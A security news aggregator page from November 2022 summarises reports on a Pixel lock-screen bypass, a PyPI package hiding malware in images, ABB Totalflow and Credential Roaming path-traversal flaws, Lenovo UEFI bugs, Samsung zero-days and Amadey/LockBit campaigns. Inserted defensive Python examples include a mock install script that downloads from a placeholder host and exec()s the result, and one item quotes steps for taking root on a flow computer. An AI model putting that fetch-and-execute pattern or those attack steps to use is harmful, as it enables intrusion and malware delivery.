Feed aggregator

Google has just patched a bug… allowing Pixel phones to be unlocked without knowing the PIN. Other vendors of Android-based phones may also be vulnerable.

Sekurak.pl - Thu, 11/10/2022 - 14:14

Have you ever suddenly forgotten a password you had mechanically typed hundreds of times? One researcher ran into exactly this problem when his phone was at 1% battery. A moment later the phone switched off, and after recharging it the researcher wanted to unlock the SIM card with its PIN… but something wasn't working :/ So he looked up the PUK code,...

The article Google has just patched a bug… allowing Pixel phones to be unlocked without knowing the PIN. Other vendors of Android-based phones may also be vulnerable. originally appeared on Sekurak.

Szpital Matki Polki in Łódź infected with ransomware. They also report a “possible leak”.

Sekurak.pl - Thu, 11/10/2022 - 13:22

We already reported the ransomware at the Instytut Centrum Zdrowia Matki Polki in Łódź on 2 November. A statement has now appeared on the hospital's website: As it shows, the Lockbit 3.0 group has been named (probably the most active ransomware group this year). Backups were also encrypted (standard procedure for ransomware groups…). The institute also reports...

The article Szpital Matki Polki in Łódź infected with ransomware. They also report a “possible leak”. originally appeared on Sekurak.

Researchers warn of malicious packages on PyPI using steganography

Security Affairs - Thu, 11/10/2022 - 11:15
Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganography to hide malware within image files.

Check Point researchers discovered a malicious package, named ‘apicolor,’ on the Python Package Index (PyPI) that uses steganography to hide malware within image files.

The malicious package infects PyPI users through open-source projects on Github. 

The package was uploaded to PyPI on October 31, 2022; it had a vague header stating it is a ‘core lib for REST API’.

The analysis of the package installation script revealed a code section at the beginning. It starts by manually installing extra requirements, then downloads an image (“8F4D2uF.png”) hosted on Imgur, uses the newly installed package, called judyb, to process the picture, and runs the output of that processing with the exec command.

“The two packages being manually installed are requests (quite popular helper package for API usage), and judyb. The judib package details initially seem like an ‘in progress’ package, having an empty description and a vague header stating this is ‘a pure Python judyb module’.” reads the analysis published by CheckPoint “A deeper look revealed judib was first released around the same time as apicolor.”

“The judyb code turned out to be a steganography module, responsible for hiding and revealing hidden messages inside pictures. Check Point Research suspected that the image downloaded during the apicolor installation may include a hidden part inside of it.”

The judyb package was used to extract obfuscated Python code hidden in the image; once decoded, that code retrieves and executes a malicious binary from a remote server.
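The install-time pattern described above (pip-install extra packages, fetch an image, decode it, hand the result to exec) can be triaged statically before a package is ever installed. The following is an added example, not Check Point's tooling and not code from the apicolor or judyb packages: it walks the AST of an install script and reports network fetches, subprocess/pip invocations and exec()/eval() on computed data, and flags the script when a network fetch and a dynamic exec occur together. The two embedded install scripts are constructed for the example; the URL, file name and the stego_reveal() function in the suspicious sample are placeholders standing in for the steps the article describes, not the real package's code.

```python
"""Static triage of a Python package's install script (setup.py).

Added example (not Check Point's tooling): walks the AST of an install
script and reports the install-time behaviours described in the article,
i.e. code that fetches remote content and hands data to exec()/eval().
"""
import ast
from dataclasses import dataclass, field

# Call targets worth flagging when they appear in an install script.
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
NETWORK_CALLS = {
    "requests.get", "requests.post", "urllib.request.urlopen",
    "urllib.request.urlretrieve", "urlopen", "urlretrieve",
}
PROCESS_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "subprocess.check_call", "os.system", "os.popen",
}


@dataclass
class Finding:
    kind: str      # "dynamic-exec", "network", "pip-install" or "subprocess"
    lineno: int
    detail: str


@dataclass
class Report:
    findings: list = field(default_factory=list)

    @property
    def kinds(self) -> set:
        return {f.kind for f in self.findings}

    @property
    def suspicious(self) -> bool:
        # Reaching the network *and* running exec() at install time is the
        # combination the apicolor write-up describes.
        return {"dynamic-exec", "network"} <= self.kinds


def _dotted_name(node):
    """Turn the callee of `a.b.c(...)` into 'a.b.c'; None for other call targets."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_install_script(source: str) -> Report:
    """Return a Report of install-time behaviours found in `source`."""
    report = Report()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        if name in DYNAMIC_EXEC:
            # exec() on a literal string can at least be read; on anything
            # else the payload only exists at run time.
            literal = bool(node.args) and isinstance(node.args[0], ast.Constant)
            report.findings.append(Finding(
                "dynamic-exec", node.lineno,
                f"{name}() on {'literal' if literal else 'computed'} data"))
        elif name in NETWORK_CALLS:
            report.findings.append(Finding("network", node.lineno, name))
        elif name in PROCESS_CALLS:
            arg_text = ast.unparse(node.args[0]) if node.args else ""
            kind = "pip-install" if "pip" in arg_text and "install" in arg_text else "subprocess"
            report.findings.append(Finding(kind, node.lineno, f"{name}({arg_text})"))
    return report


# Constructed sample in the shape of the install script described above.
# No real payload: the URL is a placeholder and stego_reveal() stands in for
# the image-decoding step (it is not judyb's real API). The script is only
# parsed, never executed.
SUSPICIOUS_SETUP = '''
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "requests", "judyb"])
import requests
img = requests.get("https://example.invalid/placeholder.png").content
open("img.png", "wb").write(img)
exec(stego_reveal("img.png"))
from setuptools import setup
setup(name="example-pkg", version="0.0.1")
'''

# Constructed benign install script for comparison.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example-pkg", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        rep = scan_install_script(src)
        print(f"{label}: suspicious={rep.suspicious}")
        for f in rep.findings:
            print(f"  line {f.lineno}: {f.kind} {f.detail}")
```

The scan is deliberately syntactic: it cannot see what a downloaded image decodes to, but it does not need to, because an install script that both talks to the network and calls exec() on data it computed at run time is unusual enough to hold for review regardless of what the payload turns out to be.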

The experts searched for code projects using the above packages and found that apicolor and judyb have low usage in GitHub projects.

The experts recommend considering only open-source projects with a good reputation, paying attention to positive feedback and the number of forks. One of the projects analyzed by the researchers, despite appearing to meet these criteria, had dozens of stars and hundreds of forks that were synthetically generated: the experts noticed only a single forking account and a set of starring accounts used to provide positive feedback to the project as part of the malicious campaign.

“Researchers are seeing a new type of organized attacks. Threat actors have progressed from the ‘mimic a common package and slightly hide your malicious code’ technique. They are creating organized campaigns that directly target certain types of users.” Check Point concludes. “Moving the infection phase from the highly watched PyPI platform to a more crowded domain, such as GitHub, makes detecting malicious packages more difficult. These type of attacks seem to target users working from home, likely individuals who use their corporate machines for side projects.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon


Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

The post Researchers warn of malicious packages on PyPI using steganography appeared first on Security Affairs.

Categories: Cyber Security News

Warning: New Massive Malicious Campaigns Targeting Top Indian Banks' Customers

The Hacker News - Thu, 11/10/2022 - 10:50
Cybersecurity researchers are warning of "massive phishing campaigns" that distribute five different malware targeting banking users in India. "The bank customers targeted include account subscribers of seven banks, including some of the most well-known banks located in the country and potentially affecting millions of customers," Trend Micro said in a report published this week. Some of the

Hacker Rewarded $70,000 for Finding Way to Bypass Google Pixel Phones' Lock Screens

The Hacker News - Thu, 11/10/2022 - 10:07
Google has resolved a high-severity security issue affecting all Pixel smartphones that could be trivially exploited to unlock the devices. The vulnerability, tracked as CVE-2022-20465 and reported by security researcher David Schütz in June 2022, was remediated as part of the search giant's monthly Android update for November 2022. "The issue allowed an attacker with physical access to bypass

A bug in ABB Totalflow flow computers exposed oil and gas companies to attack

Security Affairs - Thu, 11/10/2022 - 08:45
A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code.

Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil and gas that are critical to electric power manufacturing and distribution.

The critical systems are widely used by oil and gas organizations worldwide. The vulnerability, CVE-2022-0902 (CVSS score: 8.1), is a path-traversal issue that can be exploited by an attacker to inject and execute arbitrary code.

According to Claroty experts, the vulnerability resides in the implementation of the Totalflow TCP protocol in ABB G5 products.

“Team82 found a high-severity path-traversal vulnerability (CVE-2022-0902) in ABB’s TotalFlow Flow Computers and Remote Controllers. Attackers can exploit this flaw to gain root access on an ABB flow computer, read and write files, and remotely execute code.” reads an advisory published by Claroty.

The industrial automation giant ABB addressed the flaw with the release of firmware updates on July 14, 2022.

The researchers initially discovered an authentication bypass issue, then explored the systems looking at functionalities available to authenticated users such as uploading and downloading configuration files.

Then the experts discovered a path traversal vulnerability by requesting the /etc/shadow file.

Once they had obtained arbitrary read and write capabilities, the experts easily achieved arbitrary code execution.

“We chose the simplest approach, reading /etc/shadow and using hashcat to crack the root account password (which turned out to be root:root). Then we changed the SSH configuration file to enable root to connect using a password. Then all that was left to do was to turn on the SSH daemon (using the TotalFlow protocol) and to connect to it.” concludes the advisory.

“A successful exploit of this issue could impede a company’s ability to bill customers, forcing a disruption of services, similar to the consequences suffered by Colonial Pipeline following its 2021 ransomware attack.”


Pierluigi Paganini

(SecurityAffairs – hacking, ABB Totalflow)

The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.


Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File

The Hacker News - Thu, 11/10/2022 - 07:44
A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point. It has since been taken

Is Cybersecurity Awareness Month Anything More Than PR?

The Hacker News - Thu, 11/10/2022 - 07:13
Cybersecurity Awareness Month has been going on since 2004. This year, Cybersecurity Awareness Month urged the public, professionals, and industry partners to "see themselves in cyber" in the following ways:  The public, by taking action to stay safe online. Professionals, by joining the cyber workforce. Cyber industry partners, as part of the cybersecurity solution. CISA outlined four "things

APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity

Security Affairs - Thu, 11/10/2022 - 05:41
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity.

Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for its use of the Windows Credential Roaming feature.

Credential Roaming was introduced by Microsoft in Windows Server 2003 SP1 and is still supported on Windows 11 and Windows Server 2022. The feature is used to roam certificates and other credentials with the user within a domain.

APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

In the attack analyzed by Mandiant, the experts observed numerous LDAP queries with atypical properties performed against the Active Directory system.

“The queried LDAP attributes relate to usual credential information gathering (e.g. unixUserPassword); however, one attribute in particular stood out: {b7ff5a38-0818-42b0-8110-d3d154c97f24}, or msPKI-CredentialRoamingTokens, which is described by Microsoft as ‘storage of encrypted user credential token BLOBs for roaming’.” reads the post published by Mandiant. “Upon further inspection, Mandiant identified that this attribute is part of a lesser-known feature of Active Directory: Credential Roaming.”

The researchers discovered an arbitrary file write vulnerability: an attacker who controls the msPKIAccountCredentials LDAP attribute can add a malicious Roaming Token entry whose identifier string contains directory traversal characters, and can thereby write an arbitrary number of bytes to any file on the file system as the victim account. The report points out that the full file name plus the directory traversal characters fits within the 92-byte buffer.

Successful exploitation of the flaw can allow the attacker to achieve remote code execution in the context of the logged-in user.
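Both the ABB Totalflow path traversal reported above (a requested file name such as /etc/shadow escaping the directory the protocol was meant to serve) and the Credential Roaming flaw described here (an identifier string carrying directory traversal characters, with the 92-byte buffer noted in the report) come down to the same missing check: an attacker-controlled name was turned into a file system path without confining it to its base directory. The following added example (not ABB's or Microsoft's code) shows that check in Python: a length limit and NUL-byte rejection, rejection of absolute names, and a containment test performed only after '..' components and symlinks have been resolved. The base directory and file names are constructed for the example, and MAX_NAME_BYTES simply echoes the 92-byte figure quoted above.

```python
"""Confining an untrusted file name to a base directory.

Added example (not ABB's or Microsoft's code): the check a file download /
upload handler, or any component that turns an attacker-controlled
identifier into a file name, should apply before touching the file system.
"""
import os
from pathlib import Path

# Illustrative limit, echoing the 92-byte buffer mentioned in the report.
MAX_NAME_BYTES = 92


class PathRejected(ValueError):
    """Raised when an untrusted name must not be used as a path."""


def resolve_under(base_dir: str, untrusted_name: str) -> Path:
    """Return the resolved path of `untrusted_name` inside `base_dir`, or raise.

    - rejects NUL bytes and names longer than MAX_NAME_BYTES once encoded
    - rejects absolute names, so '/etc/shadow' cannot replace the base
    - resolves '..' and symlinks *before* the containment check, so a name
      like 'config/../../etc/shadow' is caught as well
    """
    if "\x00" in untrusted_name:
        raise PathRejected("NUL byte in name")
    if len(untrusted_name.encode("utf-8")) > MAX_NAME_BYTES:
        raise PathRejected("name too long")
    if os.path.isabs(untrusted_name):
        raise PathRejected("absolute path not allowed")

    base = Path(base_dir).resolve()
    candidate = (base / untrusted_name).resolve()
    # The candidate must be the base itself or one of its descendants.
    if candidate != base and base not in candidate.parents:
        raise PathRejected(f"{untrusted_name!r} escapes {base}")
    return candidate


def is_safe_name(base_dir: str, untrusted_name: str) -> bool:
    """Boolean convenience wrapper around resolve_under()."""
    try:
        resolve_under(base_dir, untrusted_name)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Constructed sample names a file-transfer handler might receive.
    for name in ("site.cfg", "sub/../site.cfg", "../../etc/shadow",
                 "/etc/shadow", "a" * 93, "x\x00.cfg"):
        print(f"{name[:20]!r:>24}: {'accepted' if is_safe_name('config', name) else 'rejected'}")
```

Resolving first and comparing afterwards is the part that matters: string checks for "../" are easy to bypass with encoded or mixed separators, whereas comparing the resolved candidate against the resolved base leaves no such gap. The same containment test applies whether the name arrives over a custom TCP protocol, as here, or is stored in a directory attribute and later used to build a path.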

Mandiant reported the flaw to MSRC in April 2022; the issue, tracked as CVE-2022-30170, was addressed by the IT giant on September 13.

Credential Roaming allows attackers to abuse the roamed credentials to escalate privileges. Below are the attack scenarios in which attackers could abuse Credential Roaming:

  • An organization has not applied the September 2022 patch to each system where Credential Roaming is used.
  • An attacker gained Domain Administrator privileges in an organization where Credential Roaming is in use or was used in the past without proper clean-up.
  • An attacker has access to the cleartext password of a user where Credential Roaming is in use or was in use in the past.
  • An attacker has read access to the msPKIDPAPIMasterKeys attribute on a victim account, but does not have the cleartext password of the victim user.

“Mandiant recommends organizations to check whether Credential Roaming is in use in their environment; and if so, apply the September 2022 patch urgently to remediate CVE-2022-30170.” concludes the report. “Additionally, organizations that have used Credential Roaming in the past should investigate if the proper clean-up process (as described by Microsoft) was followed.”


Pierluigi Paganini

(SecurityAffairs – hacking, APT29)

The post APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity appeared first on Security Affairs.


Citrix Issues Patches for Critical Flaw Affecting ADC and Gateway Products

The Hacker News - Thu, 11/10/2022 - 05:26
Citrix has released security updates to address a critical authentication bypass flaw in the application delivery controller (ADC) and Gateway that could be exploited to take control of affected systems. Successful exploitation of the issues could enable an adversary to gain authorized access, perform remote desktop takeover, and even circumvent defenses against login brute-force attempts under

High-Severity Flaw Reported in Critical System Used in Oil and Gas Companies

The Hacker News - Thu, 11/10/2022 - 02:49
Cybersecurity researchers have disclosed details of a new vulnerability in a system used across oil and gas organizations that could be exploited by an attacker to inject and execute arbitrary code. The vulnerability, tracked as CVE-2022-0902 (CVSS score: 8.1), is a path-traversal vulnerability in ABB Totalflow flow computers and remote controllers. "Attackers can exploit this flaw to gain root

Re-Focusing Cyber Insurance with Security Validation

The Hacker News - Thu, 11/10/2022 - 02:30
The rise in the costs of data breaches, ransomware, and other cyber attacks leads to rising cyber insurance premiums and more limited cyber insurance coverage. This cyber insurance situation increases risks for organizations struggling to find coverage or facing steep increases. Some Akin Gump Strauss Hauer & Feld LLP's law firm clients, for example, reported a three-fold increase in insurance

Lenovo warns of flaws that can be used to bypass security features

Security Affairs - Thu, 11/10/2022 - 02:21
Lenovo fixed two high-severity flaws impacting various laptop models that could allow an attacker to deactivate UEFI Secure Boot.

Lenovo has released security updates to address a couple of high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models. An attacker can exploit the flaws to disable UEFI Secure Boot.

Secure Boot is a security feature of the latest Unified Extensible Firmware Interface (UEFI) 2.3.1 specification, designed to detect tampering with boot loaders, key operating system files, and unauthorized option ROMs by validating their digital signatures. “Detections are blocked from running before they can attack or infect the system.”

An attacker able to bypass Secure Boot could bypass any security measure running on the machine and achieve persistence even if the OS is reinstalled.

The root cause of the flaws is the use of a vulnerable driver during the manufacturing process for some Lenovo devices that was mistakenly not deactivated.

Below are the vulnerabilities that were reported in Lenovo Notebook BIOS.

  • CVE-2022-3430: A potential vulnerability in the WMI Setup driver on some consumer Lenovo Notebook devices may allow an attacker with elevated privileges to modify the Secure Boot setting by modifying an NVRAM variable.
  • CVE-2022-3431: A potential vulnerability in a driver used during the manufacturing process on some consumer Lenovo Notebook devices, which was mistakenly not deactivated, may allow an attacker with elevated privileges to modify the Secure Boot setting by modifying an NVRAM variable.
  • CVE-2022-3432: A potential vulnerability in a driver used during the manufacturing process on the Ideapad Y700-14ISK, which was mistakenly not deactivated, may allow an attacker with elevated privileges to modify the Secure Boot setting by modifying an NVRAM variable.

The vulnerabilities were reported to the vendor by Martin Smolár from ESET.

#ESETResearch discovered and reported to the manufacturer 3 vulnerabilities in the #UEFI firmware of several Lenovo Notebooks. The vulnerabilities allow disabling UEFI Secure Boot or restoring factory default Secure Boot databases (incl. dbx): all simply from an OS. @smolar_m 1/9

— ESET research (@ESETresearch) November 9, 2022

“While disabling UEFI Secure Boot allows direct execution of unsigned UEFI apps, restoring factory default dbx enables the use of known vulnerable bootloaders (e.g., #CVE-2022-34301 found by @eclypsium) to bypass Secure Boot, while keeping it enabled.” reads one of the tweets published by ESET.

The experts pointed out that an attacker can trigger the flaws simply by creating special NVRAM variables. The researcher Nikolaj Schlej recently posted a good explanation of why and how firmware developers should avoid storing security-sensitive components in NVRAM variables.

Lastly, #CVE-2022-3432 relates to the BdsDxe DXE driver. This driver retrieves the value of the “L05SecBootSmm” NVRAM variable and if the value is 0, it disables UEFI Secure Boot. If the value is 1, it enables Secure Boot and restores factory keys/databases. 8/9 pic.twitter.com/kvmwwZ0dHn

— ESET research (@ESETresearch) November 9, 2022

Owners of the affected devices are strongly advised to update to the latest firmware version. The Lenovo advisory lets you determine whether a device is affected by these vulnerabilities and provides firmware update instructions.

The firmware versions that fix the vulnerabilities are mentioned under the CVE IDs, so make sure to upgrade to that version or later.

For official Lenovo software, check out this online support portal or run the update tool pre-installed on your computer.


Pierluigi Paganini

(SecurityAffairs – hacking, Secure Boot)

The post Lenovo warns of flaws that can be used to bypass security features appeared first on Security Affairs.


New UEFI Firmware Flaws Reported in Several Lenovo Notebook Models

The Hacker News - Thu, 11/10/2022 - 01:36
PC maker Lenovo has addressed yet another set of three shortcomings in the Unified Extensible Firmware Interface (UEFI) firmware affecting several Yoga, IdeaPad, and ThinkBook devices. "The vulnerabilities allow disabling UEFI Secure Boot or restoring factory default Secure Boot databases (incl. dbx): all simply from an OS," Slovak cybersecurity firm ESET explained in a series of tweets. UEFI

Surveillance vendor exploited Samsung phone zero-days

Security Affairs - Wed, 11/09/2022 - 15:51
Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits.

Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company.

The three issues are:

  • CVE-2021-25337: Improper access control in clipboard service in Samsung mobile devices prior to SMR Mar-2021 Release 1 allows untrusted applications to read or write certain local files.
  • CVE-2021-25369: An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace.
  • CVE-2021-25370: An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic.

The researchers pointed out that the surveillance firm included in its spyware the exploits for these three vulnerabilities that were zero-day at the time of their exploitation.

“This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel.” reads the advisory published by Google Project Zero. “It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety.”

The surveillance vendor chained the above vulnerabilities to compromise the Samsung phones.

The Google TAG team obtained only a partial exploit chain for Samsung phones, which was likely still in the testing phase. The experts revealed that the sample dates back to late 2020.

“The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component.” reported the advisory.

The experts explained that the exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SoC, which is used in phones sold in Europe and Africa. The exploit relies on both the Mali GPU driver and the DPU driver, which are specific to Exynos Samsung phones.

Samsung phones that were running kernel 4.14.113 in late 2020 include the S10, A50, and A51.

Google reported the vulnerabilities to Samsung immediately after their discovery in late 2020, and the vendor addressed them in March 2021.

Google did not reveal the name of the surveillance vendor; it only highlighted similarities with other campaigns that targeted Android users in Italy and Kazakhstan.

Project Zero noted that the advisories published by Samsung for these issues do not mention their exploitation in-the-wild.

“Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.” concludes the report.

“The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components.”


Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)

The post Surveillance vendor exploited Samsung phone zero-days appeared first on Security Affairs.


Automated phishing based on a scraping tool that sends an SMS with a fake link right after a new listing is published on Allegro or Allegro Lokalnie.

Sekurak.pl - Wed, 11/09/2022 - 14:32

Phishing related to Allegro and Allegro Lokalnie comes up from time to time. We recently wrote about the negative-feedback scam, and earlier about homographs in the domain name and bogus links. This time an unknown cyber-crook wrote a scraper for phishing. Scraping is a technique for extracting information from a program or web application...

The article Automated phishing based on a scraping tool that sends an SMS with a fake link right after a new listing is published on Allegro or Allegro Lokalnie. originally appeared on Sekurak.

TVP Sport channel hacked

Niebezpiecznik.pl - Wed, 11/09/2022 - 11:33
Someone took over the TVP sports channel's YouTube account (we deliberately do not link to it). They deleted all of its videos, renamed the channel to “Twitter” and for the past several dozen minutes have been streaming a feed with Elon Musk there: What is the scam? Look at the link shown to viewers of this “live stream” planted by the intruders: Viewers are sent to a site that […]

Danish railway halted by ransomware attack

Sekurak.pl - Wed, 11/09/2022 - 09:05

DSB, Denmark's largest rail operator, had to stop all trains last weekend because of an attack on an external IT service provider for the railway, the company Supeo. The paralysis of several hours from Saturday morning was caused by an attack on the Digital Backpack 2 platform, which lets train drivers obtain key operational information about occupancy...

The article Danish railway halted by ransomware attack originally appeared on Sekurak.

APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network

The Hacker News - Wed, 11/09/2022 - 08:47
The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up.

Experts observed Amadey malware deploying LockBit 3.0 Ransomware

Security Affairs - Wed, 11/09/2022 - 08:31
Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems.

Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems.

Amadey Bot is a data-stealing malware first spotted in 2018; it also allows operators to install additional payloads. The malware is sold on underground forums, and in the past it was used by cybercrime gangs such as TA505 to install GandCrab ransomware or the FlawedAmmyy RAT.

In July, ASEC researchers discovered that Amadey malware was being distributed by SmokeLoader which was hidden in software cracks and serial generation programs available on multiple sites.

“The ASEC analysis team has confirmed that attackers are using Amadey Bot to install LockBit. ” reads the report published by the security firm. “Amadey Bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon.”

At the end of October, the researchers discovered Amadey Bot distributed as a well-known South Korean messenger application named KakaoTalk.

The researchers provided details about two recent distribution cases:

In the first distribution scenario, threat actors used a malicious Word document named “Sia_Sim.docx.” It downloads a Word file that contains a malicious VBA macro; the text body includes an image that prompts the user to click “Enable Content” to enable the VBA macro, which in turn runs a PowerShell command to download and run Amadey.

The malicious Microsoft Word document (“심시아.docx“) was uploaded to VirusTotal on October 28, 2022.

In the second distribution case, threat actors disguised the Amadey malware as a seemingly harmless file bearing a Word icon that is actually an executable (“Resume.exe”). The file is distributed via phishing messages, but at this time ASEC has yet to identify the email used as a lure.

Once installed, Amadey registers to the task scheduler to gain persistence. It connects to the C&C server, sends default information of the infected system, and receives commands.

Experts noticed that Amadey receives three commands from the C2 server. These commands are used to download and execute malware from an external source.

Two commands, “cc.ps1” and “dd.ps1,” are LockBit in PowerShell form, while a third one, named “LBB.exe,” is LockBit in executable form.

“Lockbits that are installed via Amadey have been distributed in Korea since 2022, and the team has posted various articles that analyzed the ransomware. The recently confirmed version is LockBit 3.0 which is distributed using keywords such as job application and copyright. Judging from the themes, it appears that the attack is targeting companies.” concludes the report.

“As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.”


Pierluigi Paganini

(SecurityAffairs – hacking, Amadey malware)

The post Experts observed Amadey malware deploying LockBit 3.0 Ransomware appeared first on Security Affairs.

